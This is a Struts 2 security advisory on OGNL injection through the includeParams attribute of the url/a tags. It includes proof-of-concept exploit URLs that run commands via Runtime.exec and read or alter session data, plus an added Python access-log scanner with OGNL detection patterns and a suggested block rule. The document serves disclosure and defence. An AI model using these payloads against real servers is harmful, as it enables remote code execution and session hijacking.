...
Excerpt | A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks
---|---
Who should read this | All Struts 2 developers
Impact of vulnerability | Remote command execution, remote server context manipulation, injection of malicious client side code
Maximum security rating | Highly Critical
Recommendation | Developers should immediately upgrade to Struts 2.3.14.2
Affected Software | Struts 2.0.0 - Struts 2.3.14.1
Reporter | Eric Kobrin and Douglas Rodrigues (Akamai), NSFOCUS Security Team
CVE Identifier |
Problem
Both the s:url and s:a tag provide an includeParams attribute.
...
The second evaluation happens when the URL/A tag tries to resolve every parameter present in the original request.
This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily one managed by the application code) and have them evaluated as OGNL expressions, enabling execution of arbitrary methods and bypassing the protections of Struts and the OGNL library.
The issue was originally addressed by Struts 2.3.14.1 and Security Announcement S2-013. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that every version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.
Proof of concept
- Open HelloWorld.jsp present in the Struts Blank App and add the following attribute to one of the url/a tags (it also works with includeParams="get"):

```
includeParams="all"
```

so that the line looks something like this:

```xml
<s:url id="url" action="HelloWorld" includeParams="all">
```
- Run struts2-blank app
- Open the following URL, resulting in the calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7Daaa=
```

(this is the shortened version http://goo.gl/lhlTl)

The same action with the expression carried in the fakeParam parameter:

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?fakeParam=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
```
- Open the following URL to modify session content:

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}
```

- Open the following URL to print out session content and, in combination with the previous example, introduce arbitrary code into the resulting HTML output:

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}
```
As you will notice, in this case there is no way to escape/sanitize the malicious fakeParam parameter, since it is not an expected parameter and is not even evaluated when the request parameters are processed.
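Because the expression rides in a parameter the action never declares, application-side validation never sees it; the place a defender can still catch it is the request itself, at a reverse proxy, a WAF, or in the access log. The following Python script is an added example (not part of this advisory or of the Struts project) that URL-decodes the query string of each access-log request and flags any parameter name or value containing OGNL expression syntax, which is exactly the pattern the proof of concept above relies on. The log lines are constructed for the example and the regex markers are illustrative heuristics, not an exhaustive signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')

# Heuristic markers of OGNL expression syntax. A legitimate request parameter of a
# Struts 2 application has no reason to contain any of these, so each hit is worth
# an alert (or a block rule at the proxy) while the upgrade is being rolled out.
OGNL_MARKERS = [
    re.compile(r"[%$]\{"),          # %{ ... } or ${ ... } expression delimiters
    re.compile(r"#_memberAccess"),  # direct reference to the OGNL security guard
    re.compile(r"#context\b"),      # direct reference to the value stack context
    re.compile(r"@[\w.]+@\w+"),     # @class@method static call syntax
]

# Constructed sample traffic (not real log data): one benign request, one with an
# expression in a parameter value, one with an expression in a parameter name.
SAMPLE_LOG = """\
10.0.0.5 - - [24/May/2013:10:01:02 +0000] "GET /struts2-blank/example/HelloWorld.action?name=World HTTP/1.1" 200 512
10.0.0.7 - - [24/May/2013:10:01:09 +0000] "GET /struts2-blank/example/HelloWorld.action?aaa=1$%7B%23session%5B%22hacked%22%5D%7D HTTP/1.1" 200 530
10.0.0.9 - - [24/May/2013:10:01:15 +0000] "GET /struts2-blank/example/HelloWorld.action?%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)%7Daaa= HTTP/1.1" 200 540
"""


def find_ognl(text):
    """Return the patterns of every OGNL marker found in an already-decoded string."""
    return [m.pattern for m in OGNL_MARKERS if m.search(text)]


def scan_request(target):
    """Decode the query string of a request target and return suspicious parameters.

    Each finding is (where, decoded_name, markers); `where` is "name" or "value",
    because the vulnerable tag evaluates parameter names as well as values.
    """
    hits = []
    query = urlsplit(target).query
    # parse_qsl splits on '&' and '=' before percent-decoding, so an encoded '%3D'
    # inside an expression stays part of the same name or value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for where, text in (("name", name), ("value", value)):
            markers = find_ognl(text)
            if markers:
                hits.append((where, name, markers))
    return hits


def scan_log(log_text):
    """Scan access-log text; return one finding dict per request carrying OGNL syntax."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        client, timestamp, method, target, status = m.groups()
        hits = scan_request(target)
        if hits:
            findings.append({
                "client": client,
                "timestamp": timestamp,
                "method": method,
                "status": status,
                "target": target,
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        for where, name, markers in f["hits"]:
            print(f'{f["timestamp"]} {f["client"]} OGNL syntax in parameter {where} '
                  f'"{name[:40]}" (markers: {", ".join(markers)})')
```

Scanning the parameter name as well as the value matters here: the first proof-of-concept URL above carries its expression entirely in the name, with an empty value, so a rule that only inspects values would miss it. The same decode-then-match logic can be lifted into a proxy rule; a blanket reject of `${` and `%{` in any parameter is a reasonable compensating control until the application is on 2.3.14.2.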
Solution
The URL rendering subsystem of the OGNLUtil class was changed to deny eval expressions by default and to not pass any parameter name or value to OGNL evaluation.
The MemberAccess component's allowStaticMethodAccess property is now immutable.
Note: In case you need to restore the old behavior, you need to define the following constant inside your struts configuration (use it at your own risk):

```xml
<constant name="struts.ognl.enableOGNLEvalExpression" value="true" />
```
Warning: It is strongly recommended to upgrade to Struts 2.3.14.2, which contains the corrected OGNL and XWork library.